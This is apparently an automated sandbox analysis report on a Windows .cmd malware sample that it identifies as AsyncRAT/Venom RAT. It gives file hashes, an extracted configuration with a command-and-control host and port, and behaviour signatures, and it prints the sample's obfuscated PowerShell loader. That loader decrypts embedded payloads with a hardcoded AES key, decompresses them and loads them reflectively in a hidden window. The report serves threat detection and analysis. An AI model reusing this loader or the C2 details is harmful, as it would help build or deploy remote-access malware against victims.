Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 13:26
Static task
static1
Behavioral task
behavioral1
Sample
c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd
Resource
win10v2004-20240508-en
General
-
Target
c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd
-
Size
82KB
-
MD5
0c9dd4a4644d5271be6bf540daccb191
-
SHA1
452415383fd54926ce19f8f78258dc57d87c98ef
-
SHA256
c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0
-
SHA512
194d82615358dfc579e508768e2b2e3357069ea626cf90415f58459943a147e0c58d600091bf8840c1e06db9962ca01b3cd2cf9f1ee3d6685bd8d62a6219eab5
-
SSDEEP
1536:cHkGj8vp9NrhTu1iCrjNk9CRsphfkA0tNJxCK9dLbw3/4cLT4H/INmxklg:cHB8nrhTu1L8CRsp+RtIK4v3nUcM
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
undjsj.duckdns.org:8890
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2212-30-0x000001BE5B1E0000-0x000001BE5B1F6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 21 2212 powershell.exe 27 2212 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2212 powershell.exe 2540 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe 2540 powershell.exe 2540 powershell.exe 2540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 2568 wrote to memory of 4872 2568 cmd.exe cmd.exe PID 2568 wrote to memory of 4872 2568 cmd.exe cmd.exe PID 2568 wrote to memory of 1116 2568 cmd.exe cmd.exe PID 2568 wrote to memory of 1116 2568 cmd.exe cmd.exe PID 1116 wrote to memory of 1672 1116 cmd.exe cmd.exe PID 1116 wrote to memory of 1672 1116 cmd.exe cmd.exe PID 1116 wrote to memory of 4748 1116 cmd.exe cmd.exe PID 1116 wrote to memory of 4748 1116 cmd.exe cmd.exe PID 1116 wrote to memory of 2212 1116 cmd.exe powershell.exe PID 1116 wrote to memory of 2212 1116 cmd.exe powershell.exe PID 2212 wrote to memory of 2540 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2540 2212 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:4872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:1672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd';$pbWn='CCiQDreCiQDatCiQDeCiQDDeCiQDcCiQDryCiQDptCiQDoCiQDrCiQD'.Replace('CiQD', ''),'ReaxqAidLxqAiinxqAiesxqAi'.Replace('xqAi', ''),'InQyKRvokQyKReQyKR'.Replace('QyKR', ''),'SplnwOxitnwOx'.Replace('nwOx', ''),'TwpaoranwpaosfowpaormFwpaoinawpaolBwpaolwpaoocwpaokwpao'.Replace('wpao', ''),'MHTmMainHTmMModHTmMuleHTmM'.Replace('HTmM', ''),'DjIQtejIQtcomjIQtprjIQtesjIQtsjIQt'.Replace('jIQt', ''),'GXkOEetXkOECuXkOErrXkOEenXkOEtPXkOErocXkOEeXkOEssXkOE'.Replace('XkOE', ''),'CopSQYnyTSQYnoSQYn'.Replace('SQYn', ''),'EnPEgatrPEgayPoPEgainPEgatPEga'.Replace('PEga', ''),'ElmTJxemmTJxenmTJxtAtmTJx'.Replace('mTJx', ''),'FrqclComqclCBqclCaseqclC64qclCStqclCrinqclCgqclC'.Replace('qclC', ''),'ChraKjanraKjgeraKjExraKjtenraKjsraKjioraKjnraKj'.Replace('raKj', ''),'LwzKkoawzKkdwzKk'.Replace('wzKk', '');powershell -w hidden;function YbNek($AfeKW){$JkaZj=[System.Security.Cryptography.Aes]::Create();$JkaZj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$JkaZj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$JkaZj.Key=[System.Convert]::($pbWn[11])('V0mh2MCToA3bNgC8EKO2KMAaZFb3l+ctJ6Wraknusvw=');$JkaZj.IV=[System.Convert]::($pbWn[11])('prJfwam6dZ/6yyv50tuZSA==');$fCuEB=$JkaZj.($pbWn[0])();$kBOHP=$fCuEB.($pbWn[4])($AfeKW,0,$AfeKW.Length);$fCuEB.Dispose();$JkaZj.Dispose();$kBOHP;}function hgyps($AfeKW){$ALoua=New-Object System.IO.MemoryStream(,$AfeKW);$GsRzp=New-Object System.IO.MemoryStream;$WrauX=New-Object System.IO.Compression.GZipStream($ALoua,[IO.Compression.CompressionMode]::($pbWn[6]));$WrauX.($pbWn[8])($GsRzp);$WrauX.Dispose();$ALoua.Dispose();$GsRzp.Dispose();$GsRzp.ToArray();}$dfSrb=[System.IO.File]::($pbWn[1])([Console]::Title);$CHSWN=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 5).Substring(2))));$UqEWf=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 6).Substring(2))));[System.Reflection.Assembly]::($pbWn[13])([byte[]]$UqEWf).($pbWn[9]).($pbWn[2])($null,$null);[System.Reflection.Assembly]::($pbWn[13])([byte[]]$CHSWN).($pbWn[9]).($pbWn[2])($null,$null); "3⤵PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:81⤵PID:4752
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82